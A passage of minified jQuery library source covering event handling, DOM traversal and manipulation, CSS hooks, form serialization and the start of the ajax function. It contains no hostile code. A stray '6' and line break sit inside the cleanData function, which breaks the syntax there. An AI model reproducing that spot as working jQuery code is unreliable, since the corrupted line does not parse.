this.on(e,t,n,r,1)},off:function(e,n,r){var i,o;if(e&&e.preventDefault&&e.handleObj)return i=e.handleObj,x(e.delegateTarget).off(i.namespace?i.origType+"."+i.namespace:i.origType,i.selector,i.handler),this;if("object"==typeof e){for(o in e)this.off(o,n,e[o]);return this}return(n===!1||"function"==typeof n)&&(r=n,n=t),r===!1&&(r=ot),this.each(function(){x.event.remove(this,e,r,n)})},trigger:function(e,t){return this.each(function(){x.event.trigger(e,t,this)})},triggerHandler:function(e,n){var r=this[0];return r?x.event.trigger(e,n,r,!0):t}});var st=/^.[^:#\[\.,]*$/,lt=/^(?:parents|prev(?:Until|All))/,ut=x.expr.match.needsContext,ct={children:!0,contents:!0,next:!0,prev:!0};x.fn.extend({find:function(e){var t,n=[],r=this,i=r.length;if("string"!=typeof e)return this.pushStack(x(e).filter(function(){for(t=0;i>t;t++)if(x.contains(r[t],this))return!0}));for(t=0;i>t;t++)x.find(e,r[t],n);return n=this.pushStack(i>1?x.unique(n):n),n.selector=this.selector?this.selector+" "+e:e,n},has:function(e){var t,n=x(e,this),r=n.length;return this.filter(function(){for(t=0;r>t;t++)if(x.contains(this,n[t]))return!0})},not:function(e){return this.pushStack(ft(this,e||[],!0))},filter:function(e){return this.pushStack(ft(this,e||[],!1))},is:function(e){return!!ft(this,"string"==typeof e&&ut.test(e)?x(e):e||[],!1).length},closest:function(e,t){var n,r=0,i=this.length,o=[],a=ut.test(e)||"string"!=typeof e?x(e,t||this.context):0;for(;i>r;r++)for(n=this[r];n&&n!==t;n=n.parentNode)if(11>n.nodeType&&(a?a.index(n)>-1:1===n.nodeType&&x.find.matchesSelector(n,e))){n=o.push(n);break}return this.pushStack(o.length>1?x.unique(o):o)},index:function(e){return e?"string"==typeof e?x.inArray(this[0],x(e)):x.inArray(e.jquery?e[0]:e,this):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(e,t){var n="string"==typeof e?x(e,t):x.makeArray(e&&e.nodeType?[e]:e),r=x.merge(this.get(),n);return this.pushStack(x.unique(r))},addBack:function(e){return this.add(null==e?this.prevObject:this.prevObject.filter(e))}});function pt(e,t){do e=e[t];while(e&&1!==e.nodeType);return e}x.each({parent:function(e){var t=e.parentNode;return t&&11!==t.nodeType?t:null},parents:function(e){return x.dir(e,"parentNode")},parentsUntil:function(e,t,n){return x.dir(e,"parentNode",n)},next:function(e){return pt(e,"nextSibling")},prev:function(e){return pt(e,"previousSibling")},nextAll:function(e){return x.dir(e,"nextSibling")},prevAll:function(e){return x.dir(e,"previousSibling")},nextUntil:function(e,t,n){return x.dir(e,"nextSibling",n)},prevUntil:function(e,t,n){return x.dir(e,"previousSibling",n)},siblings:function(e){return x.sibling((e.parentNode||{}).firstChild,e)},children:function(e){return x.sibling(e.firstChild)},contents:function(e){return x.nodeName(e,"iframe")?e.contentDocument||e.contentWindow.document:x.merge([],e.childNodes)}},function(e,t){x.fn[e]=function(n,r){var i=x.map(this,t,n);return"Until"!==e.slice(-5)&&(r=n),r&&"string"==typeof r&&(i=x.filter(r,i)),this.length>1&&(ct[e]||(i=x.unique(i)),lt.test(e)&&(i=i.reverse())),this.pushStack(i)}}),x.extend({filter:function(e,t,n){var r=t[0];return n&&(e=":not("+e+")"),1===t.length&&1===r.nodeType?x.find.matchesSelector(r,e)?[r]:[]:x.find.matches(e,x.grep(t,function(e){return 1===e.nodeType}))},dir:function(e,n,r){var i=[],o=e[n];while(o&&9!==o.nodeType&&(r===t||1!==o.nodeType||!x(o).is(r)))1===o.nodeType&&i.push(o),o=o[n];return i},sibling:function(e,t){var n=[];for(;e;e=e.nextSibling)1===e.nodeType&&e!==t&&n.push(e);return n}});function ft(e,t,n){if(x.isFunction(t))return x.grep(e,function(e,r){return!!t.call(e,r,e)!==n});if(t.nodeType)return x.grep(e,function(e){return e===t!==n});if("string"==typeof t){if(st.test(t))return x.filter(t,e,n);t=x.filter(t,e)}return x.grep(e,function(e){return x.inArray(e,t)>=0!==n})}function dt(e){var t=ht.split("|"),n=e.createDocumentFragment();if(n.createElement)while(t.length)n.createElement(t.pop());return n}var ht="abbr|article|aside|audio|bdi|canvas|data|datalist|details|figcaption|figure|footer|header|hgroup|mark|meter|nav|output|progress|section|summary|time|video",gt=/ jQuery\d+="(?:null|\d+)"/g,mt=RegExp("<(?:"+ht+")[\\s/>]","i"),yt=/^\s+/,vt=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,bt=/<([\w:]+)/,xt=/<tbody/i,wt=/<|&#?\w+;/,Tt=/<(?:script|style|link)/i,Ct=/^(?:checkbox|radio)$/i,Nt=/checked\s*(?:[^=]|=\s*.checked.)/i,kt=/^$|\/(?:java|ecma)script/i,Et=/^true\/(.*)/,St=/^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g,At={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],area:[1,"<map>","</map>"],param:[1,"<object>","</object>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],_default:x.support.htmlSerialize?[0,"",""]:[1,"X<div>","</div>"]},jt=dt(a),Dt=jt.appendChild(a.createElement("div"));At.optgroup=At.option,At.tbody=At.tfoot=At.colgroup=At.caption=At.thead,At.th=At.td,x.fn.extend({text:function(e){return x.access(this,function(e){return e===t?x.text(this):this.empty().append((this[0]&&this[0].ownerDocument||a).createTextNode(e))},null,e,arguments.length)},append:function(){return this.domManip(arguments,function(e){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var t=Lt(this,e);t.appendChild(e)}})},prepend:function(){return this.domManip(arguments,function(e){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var t=Lt(this,e);t.insertBefore(e,t.firstChild)}})},before:function(){return this.domManip(arguments,function(e){this.parentNode&&this.parentNode.insertBefore(e,this)})},after:function(){return this.domManip(arguments,function(e){this.parentNode&&this.parentNode.insertBefore(e,this.nextSibling)})},remove:function(e,t){var n,r=e?x.filter(e,this):this,i=0;for(;null!=(n=r[i]);i++)t||1!==n.nodeType||x.cleanData(Ft(n)),n.parentNode&&(t&&x.contains(n.ownerDocument,n)&&_t(Ft(n,"script")),n.parentNode.removeChild(n));return this},empty:function(){var e,t=0;for(;null!=(e=this[t]);t++){1===e.nodeType&&x.cleanData(Ft(e,!1));while(e.firstChild)e.removeChild(e.firstChild);e.options&&x.nodeName(e,"select")&&(e.options.length=0)}return this},clone:function(e,t){return e=null==e?!1:e,t=null==t?e:t,this.map(function(){return x.clone(this,e,t)})},html:function(e){return x.access(this,function(e){var n=this[0]||{},r=0,i=this.length;if(e===t)return 1===n.nodeType?n.innerHTML.replace(gt,""):t;if(!("string"!=typeof e||Tt.test(e)||!x.support.htmlSerialize&&mt.test(e)||!x.support.leadingWhitespace&&yt.test(e)||At[(bt.exec(e)||["",""])[1].toLowerCase()])){e=e.replace(vt,"<$1></$2>");try{for(;i>r;r++)n=this[r]||{},1===n.nodeType&&(x.cleanData(Ft(n,!1)),n.innerHTML=e);n=0}catch(o){}}n&&this.empty().append(e)},null,e,arguments.length)},replaceWith:function(){var e=x.map(this,function(e){return[e.nextSibling,e.parentNode]}),t=0;return this.domManip(arguments,function(n){var r=e[t++],i=e[t++];i&&(r&&r.parentNode!==i&&(r=this.nextSibling),x(this).remove(),i.insertBefore(n,r))},!0),t?this:this.remove()},detach:function(e){return this.remove(e,!0)},domManip:function(e,t,n){e=d.apply([],e);var r,i,o,a,s,l,u=0,c=this.length,p=this,f=c-1,h=e[0],g=x.isFunction(h);if(g||!(1>=c||"string"!=typeof h||x.support.checkClone)&&Nt.test(h))return this.each(function(r){var i=p.eq(r);g&&(e[0]=h.call(this,r,i.html())),i.domManip(e,t,n)});if(c&&(l=x.buildFragment(e,this[0].ownerDocument,!1,!n&&this),r=l.firstChild,1===l.childNodes.length&&(l=r),r)){for(a=x.map(Ft(l,"script"),Ht),o=a.length;c>u;u++)i=l,u!==f&&(i=x.clone(i,!0,!0),o&&x.merge(a,Ft(i,"script"))),t.call(this[u],i,u);if(o)for(s=a[a.length-1].ownerDocument,x.map(a,qt),u=0;o>u;u++)i=a[u],kt.test(i.type||"")&&!x._data(i,"globalEval")&&x.contains(s,i)&&(i.src?x._evalUrl(i.src):x.globalEval((i.text||i.textContent||i.innerHTML||"").replace(St,"")));l=r=null}return this}});function Lt(e,t){return x.nodeName(e,"table")&&x.nodeName(1===t.nodeType?t:t.firstChild,"tr")?e.getElementsByTagName("tbody")[0]||e.appendChild(e.ownerDocument.createElement("tbody")):e}function Ht(e){return e.type=(null!==x.find.attr(e,"type"))+"/"+e.type,e}function qt(e){var t=Et.exec(e.type);return t?e.type=t[1]:e.removeAttribute("type"),e}function _t(e,t){var n,r=0;for(;null!=(n=e[r]);r++)x._data(n,"globalEval",!t||x._data(t[r],"globalEval"))}function Mt(e,t){if(1===t.nodeType&&x.hasData(e)){var n,r,i,o=x._data(e),a=x._data(t,o),s=o.events;if(s){delete a.handle,a.events={};for(n in s)for(r=0,i=s[n].length;i>r;r++)x.event.add(t,n,s[n][r])}a.data&&(a.data=x.extend({},a.data))}}function Ot(e,t){var n,r,i;if(1===t.nodeType){if(n=t.nodeName.toLowerCase(),!x.support.noCloneEvent&&t[x.expando]){i=x._data(t);for(r in i.events)x.removeEvent(t,r,i.handle);t.removeAttribute(x.expando)}"script"===n&&t.text!==e.text?(Ht(t).text=e.text,qt(t)):"object"===n?(t.parentNode&&(t.outerHTML=e.outerHTML),x.support.html5Clone&&e.innerHTML&&!x.trim(t.innerHTML)&&(t.innerHTML=e.innerHTML)):"input"===n&&Ct.test(e.type)?(t.defaultChecked=t.checked=e.checked,t.value!==e.value&&(t.value=e.value)):"option"===n?t.defaultSelected=t.selected=e.defaultSelected:("input"===n||"textarea"===n)&&(t.defaultValue=e.defaultValue)}}x.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(e,t){x.fn[e]=function(e){var n,r=0,i=[],o=x(e),a=o.length-1;for(;a>=r;r++)n=r===a?this:this.clone(!0),x(o[r])[t](n),h.apply(i,n.get());return this.pushStack(i)}});function Ft(e,n){var r,o,a=0,s=typeof e.getElementsByTagName!==i?e.getElementsByTagName(n||"*"):typeof e.querySelectorAll!==i?e.querySelectorAll(n||"*"):t;if(!s)for(s=[],r=e.childNodes||e;null!=(o=r[a]);a++)!n||x.nodeName(o,n)?s.push(o):x.merge(s,Ft(o,n));return n===t||n&&x.nodeName(e,n)?x.merge([e],s):s}function Bt(e){Ct.test(e.type)&&(e.defaultChecked=e.checked)}x.extend({clone:function(e,t,n){var r,i,o,a,s,l=x.contains(e.ownerDocument,e);if(x.support.html5Clone||x.isXMLDoc(e)||!mt.test("<"+e.nodeName+">")?o=e.cloneNode(!0):(Dt.innerHTML=e.outerHTML,Dt.removeChild(o=Dt.firstChild)),!(x.support.noCloneEvent&&x.support.noCloneChecked||1!==e.nodeType&&11!==e.nodeType||x.isXMLDoc(e)))for(r=Ft(o),s=Ft(e),a=0;null!=(i=s[a]);++a)r[a]&&Ot(i,r[a]);if(t)if(n)for(s=s||Ft(e),r=r||Ft(o),a=0;null!=(i=s[a]);a++)Mt(i,r[a]);else Mt(e,o);return r=Ft(o,"script"),r.length>0&&_t(r,!l&&Ft(e,"script")),r=s=i=null,o},buildFragment:function(e,t,n,r){var i,o,a,s,l,u,c,p=e.length,f=dt(t),d=[],h=0;for(;p>h;h++)if(o=e[h],o||0===o)if("object"===x.type(o))x.merge(d,o.nodeType?[o]:o);else if(wt.test(o)){s=s||f.appendChild(t.createElement("div")),l=(bt.exec(o)||["",""])[1].toLowerCase(),c=At[l]||At._default,s.innerHTML=c[1]+o.replace(vt,"<$1></$2>")+c[2],i=c[0];while(i--)s=s.lastChild;if(!x.support.leadingWhitespace&&yt.test(o)&&d.push(t.createTextNode(yt.exec(o)[0])),!x.support.tbody){o="table"!==l||xt.test(o)?"<table>"!==c[1]||xt.test(o)?0:s:s.firstChild,i=o&&o.childNodes.length;while(i--)x.nodeName(u=o.childNodes[i],"tbody")&&!u.childNodes.length&&o.removeChild(u)}x.merge(d,s.childNodes),s.textContent="";while(s.firstChild)s.removeChild(s.firstChild);s=f.lastChild}else d.push(t.createTextNode(o));s&&f.removeChild(s),x.support.appendChecked||x.grep(Ft(d,"input"),Bt),h=0;while(o=d[h++])if((!r||-1===x.inArray(o,r))&&(a=x.contains(o.ownerDocument,o),s=Ft(f.appendChild(o),"script"),a&&_t(s),n)){i=0;while(o=s[i++])kt.test(o.type||"")&&n.push(o)}return s=null,f},cleanData:function(e,t){var n,r,o,a,s=0,l=x.expando,u=x.cache,c=x.support.deleteExpando,f=x.event.special;for(;null!=(n=e[s]);s++)if((t||x.acceptData(n))&&(o=n[l],a=o&&u[o])){if(a.events)for(r in a.events)f[r]?x.event.remove(n,r):x.removeEvent(n,r,a.handle);
6u[o]&&(delete u[o],c?delete n[l]:typeof n.removeAttribute!==i?n.removeAttribute(l):n[l]=null,p.push(o))}},_evalUrl:function(e){return x.ajax({url:e,type:"GET",dataType:"script",async:!1,global:!1,"throws":!0})}}),x.fn.extend({wrapAll:function(e){if(x.isFunction(e))return this.each(function(t){x(this).wrapAll(e.call(this,t))});if(this[0]){var t=x(e,this[0].ownerDocument).eq(0).clone(!0);this[0].parentNode&&t.insertBefore(this[0]),t.map(function(){var e=this;while(e.firstChild&&1===e.firstChild.nodeType)e=e.firstChild;return e}).append(this)}return this},wrapInner:function(e){return x.isFunction(e)?this.each(function(t){x(this).wrapInner(e.call(this,t))}):this.each(function(){var t=x(this),n=t.contents();n.length?n.wrapAll(e):t.append(e)})},wrap:function(e){var t=x.isFunction(e);return this.each(function(n){x(this).wrapAll(t?e.call(this,n):e)})},unwrap:function(){return this.parent().each(function(){x.nodeName(this,"body")||x(this).replaceWith(this.childNodes)}).end()}});var Pt,Rt,Wt,$t=/alpha\([^)]*\)/i,It=/opacity\s*=\s*([^)]*)/,zt=/^(top|right|bottom|left)$/,Xt=/^(none|table(?!-c[ea]).+)/,Ut=/^margin/,Vt=RegExp("^("+w+")(.*)$","i"),Yt=RegExp("^("+w+")(?!px)[a-z%]+$","i"),Jt=RegExp("^([+-])=("+w+")","i"),Gt={BODY:"block"},Qt={position:"absolute",visibility:"hidden",display:"block"},Kt={letterSpacing:0,fontWeight:400},Zt=["Top","Right","Bottom","Left"],en=["Webkit","O","Moz","ms"];function tn(e,t){if(t in e)return t;var n=t.charAt(0).toUpperCase()+t.slice(1),r=t,i=en.length;while(i--)if(t=en[i]+n,t in e)return t;return r}function nn(e,t){return e=t||e,"none"===x.css(e,"display")||!x.contains(e.ownerDocument,e)}function rn(e,t){var n,r,i,o=[],a=0,s=e.length;for(;s>a;a++)r=e[a],r.style&&(o[a]=x._data(r,"olddisplay"),n=r.style.display,t?(o[a]||"none"!==n||(r.style.display=""),""===r.style.display&&nn(r)&&(o[a]=x._data(r,"olddisplay",ln(r.nodeName)))):o[a]||(i=nn(r),(n&&"none"!==n||!i)&&x._data(r,"olddisplay",i?n:x.css(r,"display"))));for(a=0;s>a;a++)r=e[a],r.style&&(t&&"none"!==r.style.display&&""!==r.style.display||(r.style.display=t?o[a]||"":"none"));return e}x.fn.extend({css:function(e,n){return x.access(this,function(e,n,r){var i,o,a={},s=0;if(x.isArray(n)){for(o=Rt(e),i=n.length;i>s;s++)a[n[s]]=x.css(e,n[s],!1,o);return a}return r!==t?x.style(e,n,r):x.css(e,n)},e,n,arguments.length>1)},show:function(){return rn(this,!0)},hide:function(){return rn(this)},toggle:function(e){return"boolean"==typeof e?e?this.show():this.hide():this.each(function(){nn(this)?x(this).show():x(this).hide()})}}),x.extend({cssHooks:{opacity:{get:function(e,t){if(t){var n=Wt(e,"opacity");return""===n?"1":n}}}},cssNumber:{columnCount:!0,fillOpacity:!0,fontWeight:!0,lineHeight:!0,opacity:!0,order:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":x.support.cssFloat?"cssFloat":"styleFloat"},style:function(e,n,r,i){if(e&&3!==e.nodeType&&8!==e.nodeType&&e.style){var o,a,s,l=x.camelCase(n),u=e.style;if(n=x.cssProps[l]||(x.cssProps[l]=tn(u,l)),s=x.cssHooks[n]||x.cssHooks[l],r===t)return s&&"get"in s&&(o=s.get(e,!1,i))!==t?o:u[n];if(a=typeof r,"string"===a&&(o=Jt.exec(r))&&(r=(o[1]+1)*o[2]+parseFloat(x.css(e,n)),a="number"),!(null==r||"number"===a&&isNaN(r)||("number"!==a||x.cssNumber[l]||(r+="px"),x.support.clearCloneStyle||""!==r||0!==n.indexOf("background")||(u[n]="inherit"),s&&"set"in s&&(r=s.set(e,r,i))===t)))try{u[n]=r}catch(c){}}},css:function(e,n,r,i){var o,a,s,l=x.camelCase(n);return n=x.cssProps[l]||(x.cssProps[l]=tn(e.style,l)),s=x.cssHooks[n]||x.cssHooks[l],s&&"get"in s&&(a=s.get(e,!0,r)),a===t&&(a=Wt(e,n,i)),"normal"===a&&n in Kt&&(a=Kt[n]),""===r||r?(o=parseFloat(a),r===!0||x.isNumeric(o)?o||0:a):a}}),e.getComputedStyle?(Rt=function(t){return e.getComputedStyle(t,null)},Wt=function(e,n,r){var i,o,a,s=r||Rt(e),l=s?s.getPropertyValue(n)||s[n]:t,u=e.style;return s&&(""!==l||x.contains(e.ownerDocument,e)||(l=x.style(e,n)),Yt.test(l)&&Ut.test(n)&&(i=u.width,o=u.minWidth,a=u.maxWidth,u.minWidth=u.maxWidth=u.width=l,l=s.width,u.width=i,u.minWidth=o,u.maxWidth=a)),l}):a.documentElement.currentStyle&&(Rt=function(e){return e.currentStyle},Wt=function(e,n,r){var i,o,a,s=r||Rt(e),l=s?s[n]:t,u=e.style;return null==l&&u&&u[n]&&(l=u[n]),Yt.test(l)&&!zt.test(n)&&(i=u.left,o=e.runtimeStyle,a=o&&o.left,a&&(o.left=e.currentStyle.left),u.left="fontSize"===n?"1em":l,l=u.pixelLeft+"px",u.left=i,a&&(o.left=a)),""===l?"auto":l});function on(e,t,n){var r=Vt.exec(t);return r?Math.max(0,r[1]-(n||0))+(r[2]||"px"):t}function an(e,t,n,r,i){var o=n===(r?"border":"content")?4:"width"===t?1:0,a=0;for(;4>o;o+=2)"margin"===n&&(a+=x.css(e,n+Zt[o],!0,i)),r?("content"===n&&(a-=x.css(e,"padding"+Zt[o],!0,i)),"margin"!==n&&(a-=x.css(e,"border"+Zt[o]+"Width",!0,i))):(a+=x.css(e,"padding"+Zt[o],!0,i),"padding"!==n&&(a+=x.css(e,"border"+Zt[o]+"Width",!0,i)));return a}function sn(e,t,n){var r=!0,i="width"===t?e.offsetWidth:e.offsetHeight,o=Rt(e),a=x.support.boxSizing&&"border-box"===x.css(e,"boxSizing",!1,o);if(0>=i||null==i){if(i=Wt(e,t,o),(0>i||null==i)&&(i=e.style[t]),Yt.test(i))return i;r=a&&(x.support.boxSizingReliable||i===e.style[t]),i=parseFloat(i)||0}return i+an(e,t,n||(a?"border":"content"),r,o)+"px"}function ln(e){var t=a,n=Gt[e];return n||(n=un(e,t),"none"!==n&&n||(Pt=(Pt||x("<iframe frameborder='0' width='0' height='0'/>").css("cssText","display:block !important")).appendTo(t.documentElement),t=(Pt[0].contentWindow||Pt[0].contentDocument).document,t.write("<!doctype html><html><body>"),t.close(),n=un(e,t),Pt.detach()),Gt[e]=n),n}function un(e,t){var n=x(t.createElement(e)).appendTo(t.body),r=x.css(n[0],"display");return n.remove(),r}x.each(["height","width"],function(e,n){x.cssHooks[n]={get:function(e,r,i){return r?0===e.offsetWidth&&Xt.test(x.css(e,"display"))?x.swap(e,Qt,function(){return sn(e,n,i)}):sn(e,n,i):t},set:function(e,t,r){var i=r&&Rt(e);return on(e,t,r?an(e,n,r,x.support.boxSizing&&"border-box"===x.css(e,"boxSizing",!1,i),i):0)}}}),x.support.opacity||(x.cssHooks.opacity={get:function(e,t){return It.test((t&&e.currentStyle?e.currentStyle.filter:e.style.filter)||"")?.01*parseFloat(RegExp.$1)+"":t?"1":""},set:function(e,t){var n=e.style,r=e.currentStyle,i=x.isNumeric(t)?"alpha(opacity="+100*t+")":"",o=r&&r.filter||n.filter||"";n.zoom=1,(t>=1||""===t)&&""===x.trim(o.replace($t,""))&&n.removeAttribute&&(n.removeAttribute("filter"),""===t||r&&!r.filter)||(n.filter=$t.test(o)?o.replace($t,i):o+" "+i)}}),x(function(){x.support.reliableMarginRight||(x.cssHooks.marginRight={get:function(e,n){return n?x.swap(e,{display:"inline-block"},Wt,[e,"marginRight"]):t}}),!x.support.pixelPosition&&x.fn.position&&x.each(["top","left"],function(e,n){x.cssHooks[n]={get:function(e,r){return r?(r=Wt(e,n),Yt.test(r)?x(e).position()[n]+"px":r):t}}})}),x.expr&&x.expr.filters&&(x.expr.filters.hidden=function(e){return 0>=e.offsetWidth&&0>=e.offsetHeight||!x.support.reliableHiddenOffsets&&"none"===(e.style&&e.style.display||x.css(e,"display"))},x.expr.filters.visible=function(e){return!x.expr.filters.hidden(e)}),x.each({margin:"",padding:"",border:"Width"},function(e,t){x.cssHooks[e+t]={expand:function(n){var r=0,i={},o="string"==typeof n?n.split(" "):[n];for(;4>r;r++)i[e+Zt[r]+t]=o[r]||o[r-2]||o[0];return i}},Ut.test(e)||(x.cssHooks[e+t].set=on)});var cn=/%20/g,pn=/\[\]$/,fn=/\r?\n/g,dn=/^(?:submit|button|image|reset|file)$/i,hn=/^(?:input|select|textarea|keygen)/i;x.fn.extend({serialize:function(){return x.param(this.serializeArray())},serializeArray:function(){return this.map(function(){var e=x.prop(this,"elements");return e?x.makeArray(e):this}).filter(function(){var e=this.type;return this.name&&!x(this).is(":disabled")&&hn.test(this.nodeName)&&!dn.test(e)&&(this.checked||!Ct.test(e))}).map(function(e,t){var n=x(this).val();return null==n?null:x.isArray(n)?x.map(n,function(e){return{name:t.name,value:e.replace(fn,"\r\n")}}):{name:t.name,value:n.replace(fn,"\r\n")}}).get()}}),x.param=function(e,n){var r,i=[],o=function(e,t){t=x.isFunction(t)?t():null==t?"":t,i[i.length]=encodeURIComponent(e)+"="+encodeURIComponent(t)};if(n===t&&(n=x.ajaxSettings&&x.ajaxSettings.traditional),x.isArray(e)||e.jquery&&!x.isPlainObject(e))x.each(e,function(){o(this.name,this.value)});else for(r in e)gn(r,e[r],n,o);return i.join("&").replace(cn,"+")};function gn(e,t,n,r){var i;if(x.isArray(t))x.each(t,function(t,i){n||pn.test(e)?r(e,i):gn(e+"["+("object"==typeof i?t:"")+"]",i,n,r)});else if(n||"object"!==x.type(t))r(e,t);else for(i in t)gn(e+"["+i+"]",t[i],n,r)}x.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error contextmenu".split(" "),function(e,t){x.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),x.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)},bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,"**"):this.off(t,e||"**",n)}});var mn,yn,vn=x.now(),bn=/\?/,xn=/#.*$/,wn=/([?&])_=[^&]*/,Tn=/^(.*?):[ \t]*([^\r\n]*)\r?$/gm,Cn=/^(?:about|app|app-storage|.+-extension|file|res|widget):$/,Nn=/^(?:GET|HEAD)$/,kn=/^\/\//,En=/^([\w.+-]+:)(?:\/\/([^\/?#:]*)(?::(\d+)|)|)/,Sn=x.fn.load,An={},jn={},Dn="*/".concat("*");try{yn=o.href}catch(Ln){yn=a.createElement("a"),yn.href="",yn=yn.href}mn=En.exec(yn.toLowerCase())||[];function Hn(e){return function(t,n){"string"!=typeof t&&(n=t,t="*");var r,i=0,o=t.toLowerCase().match(T)||[];if(x.isFunction(n))while(r=o[i++])"+"===r[0]?(r=r.slice(1)||"*",(e[r]=e[r]||[]).unshift(n)):(e[r]=e[r]||[]).push(n)}}function qn(e,n,r,i){var o={},a=e===jn;function s(l){var u;return o[l]=!0,x.each(e[l]||[],function(e,l){var c=l(n,r,i);return"string"!=typeof c||a||o[c]?a?!(u=c):t:(n.dataTypes.unshift(c),s(c),!1)}),u}return s(n.dataTypes[0])||!o["*"]&&s("*")}function _n(e,n){var r,i,o=x.ajaxSettings.flatOptions||{};for(i in n)n[i]!==t&&((o[i]?e:r||(r={}))[i]=n[i]);return r&&x.extend(!0,e,r),e}x.fn.load=function(e,n,r){if("string"!=typeof e&&Sn)return Sn.apply(this,arguments);var i,o,a,s=this,l=e.indexOf(" ");return l>=0&&(i=e.slice(l,e.length),e=e.slice(0,l)),x.isFunction(n)?(r=n,n=t):n&&"object"==typeof n&&(a="POST"),s.length>0&&x.ajax({url:e,type:a,dataType:"html",data:n}).done(function(e){o=arguments,s.html(i?x("<div>").append(x.parseHTML(e)).find(i):e)}).complete(r&&function(e,t){s.each(r,o||[e.responseText,t,e])}),this},x.each(["ajaxStart","ajaxStop","ajaxComplete","ajaxError","ajaxSuccess","ajaxSend"],function(e,t){x.fn[t]=function(e){return this.on(t,e)}}),x.extend({active:0,lastModified:{},etag:{},ajaxSettings:{url:yn,type:"GET",isLocal:Cn.test(mn[1]),global:!0,processData:!0,async:!0,contentType:"application/x-www-form-urlencoded; charset=UTF-8",accepts:{"*":Dn,text:"text/plain",html:"text/html",xml:"application/xml, text/xml",json:"application/json, text/javascript"},contents:{xml:/xml/,html:/html/,json:/json/},responseFields:{xml:"responseXML",text:"responseText",json:"responseJSON"},converters:{"* text":String,"text html":!0,"text json":x.parseJSON,"text xml":x.parseXML},flatOptions:{url:!0,context:!0}},ajaxSetup:function(e,t){return t?_n(_n(e,x.ajaxSettings),t):_n(x.ajaxSettings,e)},ajaxPrefilter:Hn(An),ajaxTransport:Hn(jn),ajax:function(e,n){"object"==typeof e&&(n=e,e=t),n=n||{};var r,i,o,a,s,l,u,c,p=x.ajaxSetup({},n),f=p.context||p,d=p.context&&(f.nodeType||f.jquery)?x(f):x.event,h=x.Deferred(),g=x.Callbacks("once memory"),m=p.statusCode||{},y={},v={},b=0,w="canceled",C={readyState:0,getResponseHeader:function(e){var t;if(2===b){if(!c){c={};while(t=Tn.exec(a))c[t[1].toLowerCase()]=t[2]}t=c[e.toLowerCase()]}return null==t?null:t},getAllResponseHeaders:function(){return 2===b?a:null},setRequestHeader:function(e,t){var n=e.toLowerCase();return b||(e=v[n]=v[n]||e,y[e]=t),this},overrideMimeType:function(e){return b||(p.mimeType=e),this},statusCode:function(e){var t;if(e)if(2>b)for(t in e)m[t]=[m[t],e[t]];else C.always(e[C.status]);return this},abort:function(e){var t=e||w;return u&&u.abort(t),k(0,t),this}};if(h.promise(C).complete=g.add,C.success=C.done,C.error=C.fail,p.url=((e||p.url||yn)+"").replace(xn,"").replace(kn,mn[1]+"//"),p.type=n.method||n.type||p.method||p.type,p.dataTypes=x.trim(p.dataType||"*").toLowerCase().match(T)||[""],null==p.crossDomain&&(r=En.exec(p.url.toLowerCase()),p.crossDomain=!(!r||r[1]===mn[1]&&r[2]===mn[2]&&(r[3]||("http:"===r[1]?"80":"443"))===(mn[3]||("http:"===mn[1]?"80":"443")))),p.data&&p.processData&&"string"!=typeof p.data&&(p.data=x.param(p.data,p.traditional)),qn(An,p,n,C),2===b)return C;l=p.global,l&&0===x.active++&&x.event.trigger("ajaxStart"),p.type=p.type.toUpperCase(),p.hasContent=!Nn.test(p.type),o=p.url,p.hasContent||(p.data&&(o=p.url+=(bn.test(o)?"&":"?")+p.data,delete p.data),p.cache===!1&&(p.url=wn.test(o)?o.replace(wn,"$1_="+vn++):o+(bn.test(o)?"&":"?")+"_="+vn++)),p.ifModified&&(x.lastModified[o]&&C.setRequestHeader("If-Modified-Since",x.lastModified[o]),x.etag[o]&&C.setRequestHeader("If-None-Match",x.etag[o])),(p.data&&p.hasContent&&p.contentType!==!1||n.contentType)&&C.setRequestHeader("Content-Type",p.contentType),C.setRequestHeader("Accept",p.dataTypes[0]&&p.accepts[p.dataTypes[0]]?p.accepts[p.dataTypes[0]]+("*"!==p.dataTypes[0]?", "+Dn+"; q=0.01":""):p.accepts["*"]);for(i in p.headers)C.setRequestHeader(i,p.headers[i]);if(p.beforeSend&&(p.beforeSend.call(f,C,p)===!1||2===b))return C.abort();w="abort";for(i in{success:1,error:1,complete:1})C[i](p[i]);if(u=qn(jn,p,n,C)){C.readyState=1,l&&d.trigger("ajaxSend",[C,p]),p.async&&p.timeout>0&&(s=setTimeout(function(){C.abort("timeout")},p.timeout));try{b=1,u.send(y,k)}catch(N){if(!(2>b))throw N;k(-1,N)}}else k(-1,"No Transport");function k(e,n,r,i){var 